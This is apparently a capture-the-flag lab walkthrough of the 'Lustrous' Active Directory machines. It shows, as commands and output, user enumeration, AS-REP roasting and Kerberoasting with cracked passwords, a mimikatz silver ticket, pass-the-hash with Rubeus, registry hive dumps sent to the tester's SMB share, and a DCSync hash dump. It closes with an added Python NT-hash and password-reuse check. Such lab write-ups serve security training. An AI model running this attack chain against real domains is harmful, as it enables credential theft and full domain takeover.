Lustrous
Last updated
Operating System: Microsoft Windows Server 2022 Standard
Chain: True (2 Machines)

| User | Password | Technique | Privileges |
|---|---|---|---|
| ben.cox | Trinity1 | AS-REP Roasting | Domain User |
| svc_web | iydgTvmujl6f | Kerberoasting | Domain Users + SPN |
| tony.ward | U_cPVQqEI50i1X | Silver Ticket | Domain User |
✅ Valid Usernames
ben.cox
svc_web
tony.ward
🔑 Passwords list
Trinity1
iydgTvmujl6f
U_cPVQqEI50i1X
Nmap Scan
Nmap scan report for 10.10.205.53
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-24 23:10:26Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
443/tcp open ssl/http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
53990/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
53991/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
54030/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
54047/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Nmap scan report for 10.10.205.54
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
FTP Anonymous Enabled
Usernames found on the FTP server (one directory per user)
Not vulnerable to DNS Zone Transfer
Root/Parent Domain
Domain SID: lu
Domain: lustrous.vl
FQDN: LusDC.lustrous.vl
SMB Signing: True (Not vulnerable to NTLM Relay)
Server allows null session authentication
The web site answers 401 Unauthorized, which indicates Kerberos (Negotiate) authentication
User enumeration with kerbrute and statistically-likely-usernames/john.smith.txt revealed valid usernames
❯ ftp 10.10.205.53
<SNIF>
229 Entering Extended Passive Mode (|||50102|)
125 Data connection already open; Transfer starting.
12-26-21 11:51AM <DIR> ben.cox
12-26-21 11:49AM <DIR> rachel.parker
12-26-21 11:49AM <DIR> tony.ward
12-26-21 11:50AM <DIR> wayne.taylor
❯ /opt/kerbrute/kerbrute userenum -d lustrous.vl --dc 10.10.205.53 /opt/statistically-likely-usernames/john.smith.txt -t 65
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 04/24/25 - Ronnie Flathers @ropnop
2025/04/24 19:16:06 > Using KDC(s):
2025/04/24 19:16:06 > 10.10.205.53:88
2025/04/24 19:16:24 > [+] VALID USERNAME: jeremy.clark@lustrous.vl
2025/04/24 19:16:28 > [+] VALID USERNAME: wayne.taylor@lustrous.vl
2025/04/24 19:16:44 > [+] VALID USERNAME: rachel.parker@lustrous.vl
2025/04/24 19:16:49 > [+] VALID USERNAME: donna.collins@lustrous.vl
2025/04/24 19:16:50 > [+] VALID USERNAME: tony.ward@lustrous.vl
2025/04/24 19:16:56 > [+] VALID USERNAME: ben.cox@lustrous.vl
2025/04/24 19:17:00 > [+] VALID USERNAME: deborah.harris@lustrous.vl
2025/04/24 19:17:01 > [+] VALID USERNAME: tracy.roberts@lustrous.vl
2025/04/24 19:19:52 > [+] VALID USERNAME: michelle.john@lustrous.vl
❯ hashcat -m 18200 ben.cox.asreproast /usr/share/wordlists/rockyou.txt
<SNIF>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5asrep$23$ben.cox@lustrous.vl@LUSTROUS.VL:2c3c4f66302bb71d9a6e03b23a681410$adee35575ead0679c058b564d3cd8212d296274a95e73f7cda711efab2a33191e9531c18c19cb6f26c0101ae253969de7c30c1ae60b54436c889b2d260b4baa14ebe0f3b88613f43a70a391fbe00769e1550aed99310b2e579c05615885c7f864c981be53eeede541af71fe284f28f1cc9cc3e7a84164dd373057e7224bf969b80f2bff026465634f327640bf69208f4354e2b5cbc78be22e124269bd3fe772b5d3be32fdbc73e7128201c11f236c91df82a60a69c1bac572d905bf2891d36b38d6876d56672a0eed1f5a58fe5e6fd48edf174dc7c3782b7c4830909ab0b58e55416fa34d133ac3cadc1:Trinity1
Valid Credentials: ben.cox:Trinity1
❯ nxc ldap 10.10.205.53 -u 'ben.cox' -p Trinity1 --kerberoast kerberoast.hashes
SMB 10.10.205.53 445 LUSDC [*] Windows Server 2022 Build 20348 x64 (name:LUSDC) (domain:lustrous.vl) (signing:True) (SMBv1:False)
LDAP 10.10.205.53 389 LUSDC [+] lustrous.vl\ben.cox:Trinity1
LDAP 10.10.205.53 389 LUSDC Bypassing disabled account krbtgt
LDAP 10.10.205.53 389 LUSDC [*] Total of records returned 4
LDAP 10.10.205.53 389 LUSDC sAMAccountName: svc_web memberOf: pwdLastSet: 2021-12-22 07:46:12.670282 lastLogon:2025-04-24 19:11:22.617108
LDAP 10.10.205.53 389 LUSDC $krb5tgs$23$*svc_web$LUSTROUS.VL$lustrous.vl/svc_web*$da8f529fc816f65caabde1b3dbf4e2a4$<SNIF>
LDAP 10.10.205.53 389 LUSDC sAMAccountName: svc_db memberOf: pwdLastSet: 2021-12-22 07:46:34.170590 lastLogon:<never>
LDAP 10.10.205.53 389 LUSDC $krb5tgs$23$*svc_db$LUSTROUS.VL$lustrous.vl/svc_db*$efcccffe3c3015bc3cca86242387c196$8277be700edbccc3fbab3a27f069cedb3422e176aff7a301633c1f493738cec7e7fc9d4dc4194f972658fbfabf46f967c73b70a476055e9d6faa42c7c5a17d2baa0f87492c2d4d50c8074c4d41e7f3c1a270b0758cda98f3c2c8ca7226734969cea9024981b9b8bff79cd6066815993cac21c45774a7c4fda04fd8859ae2c0281caf6e47bb8993123a621221907fc4a9ef0f9ac81bc630e65fac18d229965dbc70f4e91fd1207267746a87d6b2408cad166bfe50c57d0095b526d28dc97f714666c3ff9f59b05f59245344239417807c33ce1609fbcfeca101a3e3d1531bf95f05f2c959bc51bd8ea77c0a507f628b74c4a5c530fdffd41e523031accc24840e3fdbddae6ae8c07afeb53f51ae78fe557e5a64be4ecd7fe1bd789740ebc534f28ec66b048e997f6199d88c048e6c375fd9e662b94af250fe9c7c8b8c8e6d1252461f8f8bf04424ecbf857d8e846746115a048147bbe8c4cac5e7caf46240ebc36768e0802ae1e212576375dd72036b4bcfc267057e117bf22a0569eeb934938407683080260f2c326edc1e0c6ef953c9a27148af07e0c5d36177fae3b594bf6b0d811aefc7c8e29dd0e6f7b7a696f854a0ecec13d96ca225bd9d9dd63453525ee039d596ad9ddae99e923c35d25508784e28c5a21ae4087aa86e311f8c5ae648dba5e8e0c10f290ac59db5455f8ecb61c8c22de325e3d816b95b327c0ebcb4b4990a3a09d25101e6e47190839cb66c654eb6a5cc83c7f437ce25331fbf978ffdf74fec0b2c0c8e136fdc550b85b729fe0f4f48ab166806dad5cdaa3967cf84fd43f246e357fac9624042931bc8b8999e21566fccad7327bd1c71332389bcdeb87f4da76ca9d20629d0f6a64ab08ca17b209c7604f30420b069fb9eac8e465e82b8e6bc4604f652c4d52eeb453943e475724b9e3822bfacab48f5632eca8131557f5b25d77bd44d25fb19bc474b96172f8bde541fa6a0de44fc950618aa4825a532b5f926d570f217ae26874a1a8439eff2e15988af7d0efa116356978b07a4aa9ce944eb8cd555f6834140673a2ff208f61d8e75135d4e3a5c6efa2005b53213f09d3cf8fb78623b4976d14a2b71b6a8b9f0e2e5f4a3e712bfffef749fcaa0e62a84d041caf8a0e2edf697d16462aadce3647798e6ab2f48a5c6954e81029fc2d7d5b70edaa21f28e6819de295d5946d2bc1d77b87a1a0b82574907f6d3c74d75533b672965225359dbd781711063888c44d09ead1f20570b4d9134102f290416b669789bf8295955a1bbb5e945841d639fd8ccc714cae1221492e0a7d40751915d72f12940cf63ac3b9041b2f8aed5
acfac94c8c4da5ca63c666a06afe1e5eb66fe4c72193f317278881cf5efba2854b14f069c34594e0821e0c2143f2d49755502d5ddcdcf7f2df5985b1f27735049437215cd6d20f9382696ef2975c9613808acae
❯ hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt
<SNIF>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*svc_web$LUSTROUS.VL$lustrous.vl/svc_web*$d15d33ad313766eb651c4100bd94dd8d$<SNIF>:iydgTvmujl6f
Valid Credentials: svc_web:iydgTvmujl6f
During enumeration the tester found a System.Management.Automation.PSCredential object in admin.xml containing the Administrator credentials in encrypted form. Export-CliXml protects the password with DPAPI under the exporting user's key, so the file can only be decrypted by that account on that host; importing it with Import-CliXML from ben.cox's session therefore returned the Administrator's plaintext credentials.
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $Cred = Import-CliXML -Path C:\Users\ben.cox\Desktop\admin.xml
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $Cred.GetNetworkCredential().username
Administrator
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $Cred.GetNetworkCredential().password
XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF
*Evil-WinRM* PS C:\Users\ben.cox\Desktop>
❯ evil-winrm -i 10.10.205.54 -u 'Administrator' -p 'XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Using ben.cox's credentials, the tester was able to authenticate to the web site through Kerberos authentication.
While analyzing BloodHound, the tester discovered a highly valuable target, tony.ward, who is a member of the Backup Operators group. Members of this group can back up the SAM, SYSTEM and SECURITY registry hives, as well as the NTDS.dit file, and credential material can be extracted from those copies.
Because the svc_web password was recovered through Kerberoasting, its NT hash is the key under which tickets for the HTTP service on lusdc.lustrous.vl are encrypted. The tester therefore forged a silver ticket for that service impersonating tony.ward (the /rc4 value below is svc_web's NT hash) and accessed the application on his behalf.
PS C:\Users\Administrator> .\mimikatz.exe privilege::debug "kerberos::golden /domain:lustrous.vl /user:tony.ward /id:1114 /target:lusdc.lustrous.vl /service:HTTP /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /ptt" exit
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # kerberos::golden /domain:lustrous.vl /user:tony.ward /id:1114 /target:lusdc.lustrous.vl /service:HTTP /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /ptt
User : tony.ward
Domain : lustrous.vl (LUSTROUS)
SID : S-1-5-21-2355092754-1584501958-1513963426
User Id : 1114
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 - rc4_hmac_nt
Service : HTTP
Target : lusdc.lustrous.vl
Lifetime : 4/26/2025 4:52:33 AM ; 4/24/2035 4:52:33 AM ; 4/24/2035 4:52:33 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session
mimikatz(commandline) # exit
Bye!
PS C:\Users\Administrator> (iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials).Content
<SNIF>
<h2>Notes</h2>
<p>Welcome, LUSTROUS\Tony.Ward!</p>
<SNIF> <tr>
<td>
Password Reminder
</td>
<td>
U_cPVQqEI50i1X
</td>
<td>
lustrous_tony.ward
</td>
<SNIF>
PS C:\Users\Administrator>
PS C:\Users\Administrator> .\Rubeus.exe asktgt /domain:lustrous.vl /user:Tony.Ward /rc4:78b83ed65c7286b2a434bdba026244e4 /nowrap /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 78b83ed65c7286b2a434bdba026244e4
[*] Building AS-REQ (w/ preauth) for: 'lustrous.vl\Tony.Ward'
[*] Using domain controller: 10.10.140.229:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
<SNIF>
[+] Ticket successfully imported!
ServiceName : krbtgt/lustrous.vl
ServiceRealm : LUSTROUS.VL
UserName : Tony.Ward
UserRealm : LUSTROUS.VL
StartTime : 4/26/2025 5:05:43 AM
EndTime : 4/26/2025 3:05:43 PM
RenewTill : 5/3/2025 5:05:43 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : SOGhobYVXRTX3r3n2uYuyw==
ASREP (key) : 78B83ED65C7286B2A434BDBA026244E4
PS C:\Users\Administrator> .\BackupOperatorToDA.exe -u tony.ward -p U_cPVQqEI50i1X -d lustrous.vl -t \\lusdc.lustrous.vl -o \\10.8.5.48\smbfolder\
Making user token
Dumping SAM hive to \\10.8.5.48\smbfolder\SAM
Dumping SYSTEM hive to \\10.8.5.48\smbfolder\SYSTEM
Dumping SECURITY hive to \\10.8.5.48\smbfolder\SECURITY
❯ impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x9619c4c8e8d0c1e1314ca899f5573926
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1e10fc3898a203cbc159f559d8183297:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:0981fd4f8fc47444e5e696ca6626c7a336eb220d0534ca23ad6a2bb042f5fdd25e030ce6015fdb518d40685530ab5193ec9272c3513f0f6a0280aed3ef7eaa92c0730a287a2ef933b5c4e870a0233b44b81d35e33efe5d62ae847f84bef14b3fcf57930a49cba029e740800ae4f9721558b913de32531fa5bc89ba06d00748573d0b6935502b24852b8fa2ea74e1def3f6bb1d633f0531a686f61d2f66bf338e0b39d51da37488dd446e3982ed239bcf9395ca463cacd3c695eb0ff09e74f977e792e2cbcf786b5015ad7062de0e39f1a429390e0b843d8fb04a96280b1a28252afa3155c713ac260af165655e7897ec
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:fb2c49ead49730d2b4e701c4bd169af4
[*] DPAPI_SYSTEM
dpapi_machinekey:0x908c1b9d1eba6062f66247d016952eab010c4f62
dpapi_userkey:0xe7d85d4c5db116a07bd02c655623691eae32c387
[*] NL$KM
0000 B6 96 C7 7E 17 8A 0C DD 8C 39 C2 0A A2 91 24 44 ...~.....9....$D
0010 A2 E4 4D C2 09 59 46 C0 7F 95 EA 11 CB 7F CB 72 ..M..YF........r
0020 EC 2E 5A 06 01 1B 26 FE 6D A7 88 0F A5 E7 1F A5 ..Z...&.m.......
0030 96 CD E5 3F A0 06 5E C1 A5 01 A1 CE 8C 24 76 95 ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up...
❯ impacket-secretsdump -k -no-pass lusdc.lustrous.vl -just-dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b8d9c7bd6de2a14237e0eff1afda2476:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:39049058eaa5309ce13788c31fcba8a4:::
lustrous.vl\Deborah.Harris:1104:aad3b435b51404eeaad3b435b51404ee:87009f579ed9bc7dd01c6d369c3f99b8:::
lustrous.vl\Duncan.Spencer:1105:aad3b435b51404eeaad3b435b51404ee:64587f4044d57329db255cbed249ce4e:::
lustrous.vl\Brenda.Andrews:1106:aad3b435b51404eeaad3b435b51404ee:70f159bb0c84242302014ce70a7f5ae6:::
lustrous.vl\Rachel.Parker:1107:aad3b435b51404eeaad3b435b51404ee:924bb1caac4986b7c95097f33336980a:::
lustrous.vl\Wayne.Taylor:1108:aad3b435b51404eeaad3b435b51404ee:78b83ed65c7286b2a434bdba026244e4:::
lustrous.vl\Hugh.Wilkinson:1110:aad3b435b51404eeaad3b435b51404ee:46213f1b9d43de00629e338e0b040029:::
lustrous.vl\Tracy.Roberts:1111:aad3b435b51404eeaad3b435b51404ee:b291d04a0d7b6cdb63b46727a38f1b86:::
lustrous.vl\Bradley.Hancock:1113:aad3b435b51404eeaad3b435b51404ee:cbadf75321c9aa0a47b403ef1e0a7c55:::
lustrous.vl\Tony.Ward:1114:aad3b435b51404eeaad3b435b51404ee:78b83ed65c7286b2a434bdba026244e4:::
lustrous.vl\Joanna.Hall:1115:aad3b435b51404eeaad3b435b51404ee:7837938248efd8b5d6115c8cce33159a:::
lustrous.vl\Marian.Elliott:1116:aad3b435b51404eeaad3b435b51404ee:2663fd84b68f22555d66508b7fddb28e:::
lustrous.vl\Ben.Cox:1117:aad3b435b51404eeaad3b435b51404ee:779041047eed27dc382579f2e9c1bd78:::
lustrous.vl\Joanna.Harvey:1119:aad3b435b51404eeaad3b435b51404ee:000408bc26781f3453c485652fbfcc71:::
lustrous.vl\Jeremy.Clark:1120:aad3b435b51404eeaad3b435b51404ee:46068039554c7592d962ee79e86ed66b:::
lustrous.vl\Allan.Parker:1121:aad3b435b51404eeaad3b435b51404ee:7f6565f779ab0e30a8a89d9563571f5d:::
lustrous.vl\Mitchell.Fuller:1122:aad3b435b51404eeaad3b435b51404ee:ac55b50b2fdc4ecc91c9c511cbf67529:::
lustrous.vl\Colin.Dodd:1123:aad3b435b51404eeaad3b435b51404ee:13416726f488801791d0027da08fd72c:::
lustrous.vl\Liam.Atkinson:1124:aad3b435b51404eeaad3b435b51404ee:dc5248d6c0d804c638674d3ba61a27ad:::
lustrous.vl\Michelle.John:1125:aad3b435b51404eeaad3b435b51404ee:a987c80448f62e33a7ac269bef95e965:::
lustrous.vl\Iain.Evans:1126:aad3b435b51404eeaad3b435b51404ee:625fdd59d5d1b64d5f354a11f8a8d1b0:::
lustrous.vl\Donna.Collins:1127:aad3b435b51404eeaad3b435b51404ee:ada5c99f86d2f40d1e7103cda5647b09:::
lustrous.vl\Cameron.Walsh:1128:aad3b435b51404eeaad3b435b51404ee:7c55400f3da31598559e5227114e59ad:::
lustrous.vl\svc_web:1129:aad3b435b51404eeaad3b435b51404ee:e67af8b3d78df5a02eb0d57b6cb60717:::
lustrous.vl\svc_db:1130:aad3b435b51404eeaad3b435b51404ee:e9e4f101deca969c1b531486554e8400:::
LUSDC$:1000:aad3b435b51404eeaad3b435b51404ee:fb2c49ead49730d2b4e701c4bd169af4:::
LUSMS$:1133:aad3b435b51404eeaad3b435b51404ee:27383df0ae52aa0213165ee708d220b9:::
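The svc_web silver ticket works because an account's RC4-HMAC Kerberos key is simply its NT hash, so a Kerberoast-cracked password hands over the service key; the same hash also lets a defender spot password reuse in the NTDS dump (Wayne.Taylor and Tony.Ward share one NT hash above). The following Python is an added example, not part of the original writeup: it implements NT hashing with a pure MD4 (hashlib's md4 is often unavailable on OpenSSL 3), checks that the cracked svc_web password yields the /rc4 value used in the mimikatz command, and groups secretsdump rows by NT hash; SAMPLE_DUMP is three rows copied from the dump above, and the function names are this example's own.

```python
import struct
from collections import defaultdict
MASK = 0xFFFFFFFF
# Three rows copied from the secretsdump output above (constructed sample input).
SAMPLE_DUMP = [
    "lustrous.vl\\Wayne.Taylor:1108:aad3b435b51404eeaad3b435b51404ee:78b83ed65c7286b2a434bdba026244e4:::",
    "lustrous.vl\\Tony.Ward:1114:aad3b435b51404eeaad3b435b51404ee:78b83ed65c7286b2a434bdba026244e4:::",
    "lustrous.vl\\svc_web:1129:aad3b435b51404eeaad3b435b51404ee:e67af8b3d78df5a02eb0d57b6cb60717:::",
]
def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK

def _round(fn, X, ks, ss, const, regs):
    # One MD4 round: 16 steps; registers rotate so each step updates "a".
    a, b, c, d = regs
    for i in range(16):
        a = _lrot((a + fn(b, c, d) + X[ks[i]] + const) & MASK, ss[i % 4])
        a, b, c, d = d, a, b, c
    return a, b, c, d
def md4(data: bytes) -> bytes:
    # RFC 1320 MD4, written out because hashlib's md4 lives in OpenSSL's legacy provider.
    regs = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        r = _round(F, X, list(range(16)), (3, 7, 11, 19), 0, regs)
        r = _round(G, X, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15],
                   (3, 5, 9, 13), 0x5A827999, r)
        r = _round(H, X, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15],
                   (3, 9, 11, 15), 0x6ED9EBA1, r)
        regs = tuple((x + y) & MASK for x, y in zip(regs, r))
    return struct.pack("<4I", *regs)

def nt_hash(password: str) -> str:
    # NT hash = MD4 over the UTF-16LE password; it is also the RC4-HMAC Kerberos key.
    return md4(password.encode("utf-16-le")).hex()
def cracked_password_is_service_key(password: str, rc4_key_hex: str) -> bool:
    # True when a cracked password yields the key that tickets for that account's SPN use.
    return nt_hash(password) == rc4_key_hex.lower()

def accounts_sharing_nt_hash(secretsdump_lines):
    # Group secretsdump rows (user:rid:lmhash:nthash:::) by NT hash: same hash, same password.
    groups = defaultdict(list)
    for line in secretsdump_lines:
        parts = line.strip().split(":")
        if len(parts) >= 4 and len(parts[3]) == 32:
            groups[parts[3]].append(parts[0].split("\\")[-1])
    return {h: users for h, users in groups.items() if len(users) > 1}
```

Run against a full secretsdump output, accounts_sharing_nt_hash flags every set of accounts that share a password, which is the reuse finding a defender should report alongside the cracked service accounts.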